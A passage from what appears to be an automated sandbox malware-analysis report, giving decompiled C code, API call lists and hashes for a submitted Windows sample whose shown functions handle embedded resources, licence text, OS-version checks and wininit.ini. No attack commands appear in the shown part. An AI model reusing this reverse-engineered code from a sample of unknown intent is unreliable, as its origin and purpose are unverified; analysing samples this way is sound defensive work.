                                                                                                                                                                                                          							_t36 = 0;
                                                                                                                                                                                                          							FreeResource(??);
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							FreeResource();
                                                                                                                                                                                                          							_v36 = _v36 + 1;
                                                                                                                                                                                                          							E0086171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                          							_t46 = 0;
                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                          					return E00866CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				goto L12;
                                                                                                                                                                                                          			}






















                                                                                                                                                                                                          0x00866298
                                                                                                                                                                                                          0x008662a0
                                                                                                                                                                                                          0x008662a7
                                                                                                                                                                                                          0x008662ad
                                                                                                                                                                                                          0x008662af
                                                                                                                                                                                                          0x008662bb
                                                                                                                                                                                                          0x008662c3
                                                                                                                                                                                                          0x008662c4
                                                                                                                                                                                                          0x0086633b
                                                                                                                                                                                                          0x0086633b
                                                                                                                                                                                                          0x00866345
                                                                                                                                                                                                          0x0086634d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008662da
                                                                                                                                                                                                          0x008662de
                                                                                                                                                                                                          0x0086635f
                                                                                                                                                                                                          0x00866369
                                                                                                                                                                                                          0x008662e0
                                                                                                                                                                                                          0x008662e0
                                                                                                                                                                                                          0x008662e0
                                                                                                                                                                                                          0x008662e3
                                                                                                                                                                                                          0x008662e5
                                                                                                                                                                                                          0x008662e5
                                                                                                                                                                                                          0x008662e8
                                                                                                                                                                                                          0x008662e8
                                                                                                                                                                                                          0x008662ea
                                                                                                                                                                                                          0x008662eb
                                                                                                                                                                                                          0x008662ef
                                                                                                                                                                                                          0x008662f1
                                                                                                                                                                                                          0x008662f3
                                                                                                                                                                                                          0x00866302
                                                                                                                                                                                                          0x00866308
                                                                                                                                                                                                          0x0086630d
                                                                                                                                                                                                          0x00866314
                                                                                                                                                                                                          0x00866314
                                                                                                                                                                                                          0x00866316
                                                                                                                                                                                                          0x00866319
                                                                                                                                                                                                          0x00866355
                                                                                                                                                                                                          0x00866357
                                                                                                                                                                                                          0x0086631b
                                                                                                                                                                                                          0x0086631b
                                                                                                                                                                                                          0x00866331
                                                                                                                                                                                                          0x00866334
                                                                                                                                                                                                          0x00866339
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00866339
                                                                                                                                                                                                          0x00866319
                                                                                                                                                                                                          0x0086636b
                                                                                                                                                                                                          0x0086637d
                                                                                                                                                                                                          0x0086637d
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0086171E: _vsnprintf.MSVCRT ref: 00861750
                                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,008651CA,00000004,00000024,00862F71,?,00000002,00000000), ref: 008662CD
                                                                                                                                                                                                          • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,008651CA,00000004,00000024,00862F71,?,00000002,00000000), ref: 008662D4
                                                                                                                                                                                                          • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,008651CA,00000004,00000024,00862F71,?,00000002,00000000), ref: 0086631B
                                                                                                                                                                                                          • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00866345
                                                                                                                                                                                                          • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,008651CA,00000004,00000024,00862F71,?,00000002,00000000), ref: 00866357
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                          • String ID: UPDFILE%lu
                                                                                                                                                                                                          • API String ID: 2922116661-2329316264
                                                                                                                                                                                                          • Opcode ID: 9057978f130cfc17423515812a06c9af770ac56ed4299dcb09985fc5c754a90f
                                                                                                                                                                                                          • Instruction ID: bb7ec774de51ec6d3330548cd5021da380da5b7189a67733aebce3e913247173
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9057978f130cfc17423515812a06c9af770ac56ed4299dcb09985fc5c754a90f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB212331A00219ABCB149F649D499BEBB78FB48704B060129F902E3341EB798D128BE1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                          			E0086681F(void* __ebx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                          				void* _v172;
                                                                                                                                                                                                          				int* _v176;
                                                                                                                                                                                                          				int _v180;
                                                                                                                                                                                                          				int _v184;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t19;
                                                                                                                                                                                                          				long _t31;
                                                                                                                                                                                                          				signed int _t35;
                                                                                                                                                                                                          				void* _t36;
                                                                                                                                                                                                          				intOrPtr _t41;
                                                                                                                                                                                                          				signed int _t44;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t36 = __ebx;
                                                                                                                                                                                                          				_t19 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                          				_t41 =  *0x8681d8; // 0xfffffffe
                                                                                                                                                                                                          				_t43 = 0;
                                                                                                                                                                                                          				_v180 = 0xc;
                                                                                                                                                                                                          				_v176 = 0;
                                                                                                                                                                                                          				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                          					 *0x8681d8 = 0;
                                                                                                                                                                                                          					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                          					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                          						L12:
                                                                                                                                                                                                          						_t41 =  *0x8681d8; // 0xfffffffe
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t41 = 1;
                                                                                                                                                                                                          						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                          							goto L12;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t31 = RegQueryValueExA(_v172, 0x861140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                          							_t43 = _t31;
                                                                                                                                                                                                          							RegCloseKey(_v172);
                                                                                                                                                                                                          							if(_t31 != 0) {
                                                                                                                                                                                                          								goto L12;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t40 =  &_v176;
                                                                                                                                                                                                          								if(E008666F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                          									goto L12;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                          									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                          										 *0x8681d8 = _t41;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										goto L12;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                          			}


















                                                                                                                                                                                                          0x0086681f
                                                                                                                                                                                                          0x0086682a
                                                                                                                                                                                                          0x00866831
                                                                                                                                                                                                          0x00866836
                                                                                                                                                                                                          0x0086683c
                                                                                                                                                                                                          0x0086683e
                                                                                                                                                                                                          0x00866848
                                                                                                                                                                                                          0x00866851
                                                                                                                                                                                                          0x0086685d
                                                                                                                                                                                                          0x00866864
                                                                                                                                                                                                          0x00866876
                                                                                                                                                                                                          0x0086693a
                                                                                                                                                                                                          0x0086693a
                                                                                                                                                                                                          0x0086687c
                                                                                                                                                                                                          0x0086687e
                                                                                                                                                                                                          0x00866885
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008668d6
                                                                                                                                                                                                          0x008668f4
                                                                                                                                                                                                          0x00866900
                                                                                                                                                                                                          0x00866902
                                                                                                                                                                                                          0x0086690a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086690c
                                                                                                                                                                                                          0x0086690c
                                                                                                                                                                                                          0x0086691c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086691e
                                                                                                                                                                                                          0x00866924
                                                                                                                                                                                                          0x0086692b
                                                                                                                                                                                                          0x00866932
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086692b
                                                                                                                                                                                                          0x0086691c
                                                                                                                                                                                                          0x0086690a
                                                                                                                                                                                                          0x00866885
                                                                                                                                                                                                          0x00866876
                                                                                                                                                                                                          0x00866951

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0086686E
                                                                                                                                                                                                          • GetSystemMetrics.USER32(0000004A), ref: 008668A7
                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 008668CC
                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,00861140,00000000,?,?,0000000C), ref: 008668F4
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00866902
                                                                                                                                                                                                            • Part of subcall function 008666F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0086691A), ref: 00866741
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Control Panel\Desktop\ResourceLocale, xrefs: 008668C2
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                          • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                          • API String ID: 3346862599-1109908249
                                                                                                                                                                                                          • Opcode ID: 00a2371be1694ffef26468245031e626754772ff425044bed637e92cdb7d8e02
                                                                                                                                                                                                          • Instruction ID: c69dd78b981c7b44db8ff4fb7bb688988a507a320470ce5f920d3b339259061f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00a2371be1694ffef26468245031e626754772ff425044bed637e92cdb7d8e02
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4318031A00259DFDF218B21DC45BAABB78FB45728F0201A5E94DF2140EB709D958F92
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00863A3F(void* __eflags) {
                                                                                                                                                                                                          				void* _t3;
                                                                                                                                                                                                          				void* _t9;
                                                                                                                                                                                                          				CHAR* _t16;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t16 = "LICENSE";
                                                                                                                                                                                                          				_t1 = E0086468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                          				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                          				 *0x868d4c = _t3;
                                                                                                                                                                                                          				if(_t3 != 0) {
                                                                                                                                                                                                          					_t19 = _t16;
                                                                                                                                                                                                          					if(E0086468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                          						if(lstrcmpA( *0x868d4c, "<None>") == 0) {
                                                                                                                                                                                                          							LocalFree( *0x868d4c);
                                                                                                                                                                                                          							L9:
                                                                                                                                                                                                          							 *0x869124 = 0;
                                                                                                                                                                                                          							return 1;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t9 = E00866517(_t19, 0x7d1, 0, E00863100, 0, 0);
                                                                                                                                                                                                          						LocalFree( *0x868d4c);
                                                                                                                                                                                                          						if(_t9 != 0) {
                                                                                                                                                                                                          							goto L9;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						 *0x869124 = 0x800704c7;
                                                                                                                                                                                                          						L2:
                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					E008644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                          					LocalFree( *0x868d4c);
                                                                                                                                                                                                          					 *0x869124 = 0x80070714;
                                                                                                                                                                                                          					goto L2;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				E008644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                          				 *0x869124 = E00866285();
                                                                                                                                                                                                          				goto L2;
                                                                                                                                                                                                          			}






                                                                                                                                                                                                          0x00863a46
                                                                                                                                                                                                          0x00863a57
                                                                                                                                                                                                          0x00863a5d
                                                                                                                                                                                                          0x00863a63
                                                                                                                                                                                                          0x00863a6a
                                                                                                                                                                                                          0x00863a91
                                                                                                                                                                                                          0x00863a9a
                                                                                                                                                                                                          0x00863ad8
                                                                                                                                                                                                          0x00863b13
                                                                                                                                                                                                          0x00863b19
                                                                                                                                                                                                          0x00863b1b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863b21
                                                                                                                                                                                                          0x00863ae7
                                                                                                                                                                                                          0x00863af4
                                                                                                                                                                                                          0x00863afc
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863afe
                                                                                                                                                                                                          0x00863a87
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863a87
                                                                                                                                                                                                          0x00863aa8
                                                                                                                                                                                                          0x00863ab3
                                                                                                                                                                                                          0x00863ab9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863ab9
                                                                                                                                                                                                          0x00863a78
                                                                                                                                                                                                          0x00863a82
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646A0
                                                                                                                                                                                                            • Part of subcall function 0086468F: SizeofResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646A9
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646C3
                                                                                                                                                                                                            • Part of subcall function 0086468F: LoadResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646CC
                                                                                                                                                                                                            • Part of subcall function 0086468F: LockResource.KERNEL32(00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646D3
                                                                                                                                                                                                            • Part of subcall function 0086468F: memcpy_s.MSVCRT ref: 008646E5
                                                                                                                                                                                                            • Part of subcall function 0086468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008646EF
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00862F64,?,00000002,00000000), ref: 00863A5D
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00863AB3
                                                                                                                                                                                                            • Part of subcall function 008644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00864518
                                                                                                                                                                                                            • Part of subcall function 008644B9: MessageBoxA.USER32(?,?,herso,00010010), ref: 00864554
                                                                                                                                                                                                            • Part of subcall function 00866285: GetLastError.KERNEL32(00865BBC), ref: 00866285
                                                                                                                                                                                                          • lstrcmpA.KERNEL32(<None>,00000000), ref: 00863AD0
                                                                                                                                                                                                          • LocalFree.KERNEL32 ref: 00863B13
                                                                                                                                                                                                            • Part of subcall function 00866517: FindResourceA.KERNEL32(00860000,000007D6,00000005), ref: 0086652A
                                                                                                                                                                                                            • Part of subcall function 00866517: LoadResource.KERNEL32(00860000,00000000,?,?,00862EE8,00000000,008619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00866538
                                                                                                                                                                                                            • Part of subcall function 00866517: DialogBoxIndirectParamA.USER32(00860000,00000000,00000547,008619E0,00000000), ref: 00866557
                                                                                                                                                                                                            • Part of subcall function 00866517: FreeResource.KERNEL32(00000000,?,?,00862EE8,00000000,008619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00866560
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,00863100,00000000,00000000), ref: 00863AF4
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                          • String ID: <None>$LICENSE
                                                                                                                                                                                                          • API String ID: 2414642746-383193767
                                                                                                                                                                                                          • Opcode ID: 52b8e8120424b9285d87039b04d63ef0ecc6fc00a21e66c1e362096d22889bd0
                                                                                                                                                                                                          • Instruction ID: 3a84744c692bd0f4d853f43bef36bc9d6bc4f72cd08d635cb9f30556f24d1a7e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52b8e8120424b9285d87039b04d63ef0ecc6fc00a21e66c1e362096d22889bd0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9111DD70301201EBD7649F76AC0AE1739BEFBD5710B13512DF545EB2E1EEF988009625
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                          			E008624E0(void* __ebx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t7;
                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                          				long _t26;
                                                                                                                                                                                                          				signed int _t27;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t20 = __ebx;
                                                                                                                                                                                                          				_t7 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                          				_t25 = 0x104;
                                                                                                                                                                                                          				_t26 = 0;
                                                                                                                                                                                                          				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                          					E0086658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                          					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                          					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                          					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                          						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                          						_lclose(_t25);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                          			}











                                                                                                                                                                                                          0x008624e0
                                                                                                                                                                                                          0x008624eb
                                                                                                                                                                                                          0x008624f2
                                                                                                                                                                                                          0x008624f7
                                                                                                                                                                                                          0x00862504
                                                                                                                                                                                                          0x0086250e
                                                                                                                                                                                                          0x0086251d
                                                                                                                                                                                                          0x0086252c
                                                                                                                                                                                                          0x00862541
                                                                                                                                                                                                          0x00862546
                                                                                                                                                                                                          0x00862553
                                                                                                                                                                                                          0x00862555
                                                                                                                                                                                                          0x00862555
                                                                                                                                                                                                          0x00862546
                                                                                                                                                                                                          0x0086256c

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00862506
                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0086252C
                                                                                                                                                                                                          • _lopen.KERNEL32 ref: 0086253B
                                                                                                                                                                                                          • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0086254C
                                                                                                                                                                                                          • _lclose.KERNEL32(00000000), ref: 00862555
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                          • String ID: wininit.ini
                                                                                                                                                                                                          • API String ID: 3273605193-4206010578
                                                                                                                                                                                                          • Opcode ID: dc82fa7edd1b91426adfbea592229b4aea0d1ed054676d741007d5826f8de1b8
                                                                                                                                                                                                          • Instruction ID: 4ebb9a5aa17310318c1185b47d3f6df3d0e13398e5e1181d7d00acf556d7eaf5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc82fa7edd1b91426adfbea592229b4aea0d1ed054676d741007d5826f8de1b8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C01B532600518A7C720EB699C0DEDF7B7CFB45750F020195FA59E3190DEB48E45CE92
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                          			E008636EE(CHAR* __ecx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                          				signed int _v420;
                                                                                                                                                                                                          				signed int _v424;
                                                                                                                                                                                                          				CHAR* _v428;
                                                                                                                                                                                                          				CHAR* _v432;
                                                                                                                                                                                                          				signed int _v436;
                                                                                                                                                                                                          				CHAR* _v440;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t72;
                                                                                                                                                                                                          				CHAR* _t77;
                                                                                                                                                                                                          				CHAR* _t91;
                                                                                                                                                                                                          				CHAR* _t94;
                                                                                                                                                                                                          				int _t97;
                                                                                                                                                                                                          				CHAR* _t98;
                                                                                                                                                                                                          				signed char _t99;
                                                                                                                                                                                                          				CHAR* _t104;
                                                                                                                                                                                                          				signed short _t107;
                                                                                                                                                                                                          				signed int _t109;
                                                                                                                                                                                                          				short _t113;
                                                                                                                                                                                                          				void* _t114;
                                                                                                                                                                                                          				signed char _t115;
                                                                                                                                                                                                          				short _t119;
                                                                                                                                                                                                          				CHAR* _t123;
                                                                                                                                                                                                          				CHAR* _t124;
                                                                                                                                                                                                          				CHAR* _t129;
                                                                                                                                                                                                          				signed int _t131;
                                                                                                                                                                                                          				signed int _t132;
                                                                                                                                                                                                          				CHAR* _t135;
                                                                                                                                                                                                          				CHAR* _t138;
                                                                                                                                                                                                          				signed int _t139;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t72 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                          				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                          				_t115 = __ecx;
                                                                                                                                                                                                          				_t135 = 0;
                                                                                                                                                                                                          				_v432 = __ecx;
                                                                                                                                                                                                          				_t138 = 0;
                                                                                                                                                                                                          				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                          					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                          					_t119 = 2;
                                                                                                                                                                                                          					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                          					__eflags = _t77;
                                                                                                                                                                                                          					if(_t77 == 0) {
                                                                                                                                                                                                          						_t119 = 0;
                                                                                                                                                                                                          						__eflags = 1;
                                                                                                                                                                                                          						 *0x868184 = 1;
                                                                                                                                                                                                          						 *0x868180 = 1;
                                                                                                                                                                                                          						L13:
                                                                                                                                                                                                          						 *0x869a40 = _t119;
                                                                                                                                                                                                          						L14:
                                                                                                                                                                                                          						__eflags =  *0x868a34 - _t138; // 0x0
                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                          							goto L66;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _t115;
                                                                                                                                                                                                          						if(_t115 == 0) {
                                                                                                                                                                                                          							goto L66;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_v428 = _t135;
                                                                                                                                                                                                          						__eflags = _t119;
                                                                                                                                                                                                          						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                          						_t11 =  &_v420;
                                                                                                                                                                                                          						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                          						__eflags =  *_t11;
                                                                                                                                                                                                          						_v440 = _t115;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_v424 = _t135 * 0x18;
                                                                                                                                                                                                          							_v436 = E00862A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                          							_t91 = E00862A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                          							_t123 = _v436;
                                                                                                                                                                                                          							_t133 = 0x54d;
                                                                                                                                                                                                          							__eflags = _t123;
                                                                                                                                                                                                          							if(_t123 < 0) {
                                                                                                                                                                                                          								L32:
                                                                                                                                                                                                          								__eflags = _v420 - 1;
                                                                                                                                                                                                          								if(_v420 == 1) {
                                                                                                                                                                                                          									_t138 = 0x54c;
                                                                                                                                                                                                          									L36:
                                                                                                                                                                                                          									__eflags = _t138;
                                                                                                                                                                                                          									if(_t138 != 0) {
                                                                                                                                                                                                          										L40:
                                                                                                                                                                                                          										__eflags = _t138 - _t133;
                                                                                                                                                                                                          										if(_t138 == _t133) {
                                                                                                                                                                                                          											L30:
                                                                                                                                                                                                          											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                          											_t115 = 0;
                                                                                                                                                                                                          											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                          											__eflags = _t138 - _t133;
                                                                                                                                                                                                          											_t133 = _v432;
                                                                                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                                                                                          												_t124 = _v440;
                                                                                                                                                                                                          											} else {
